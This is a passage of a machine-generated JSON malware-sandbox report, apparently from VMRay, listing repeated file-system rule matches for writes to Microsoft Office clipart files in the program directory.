"ref_id": "gfn_36118", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36129", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36136", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36143", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36150", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36157", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36164", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36171", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36180", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36200", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36211", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36218", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36227", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36236", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36247", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36254", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36261", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36268", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36275", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36286", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36295", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36304", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36311", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36320", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36329", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36338", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36349", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36358", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36365", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36372", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36379", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36386", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft 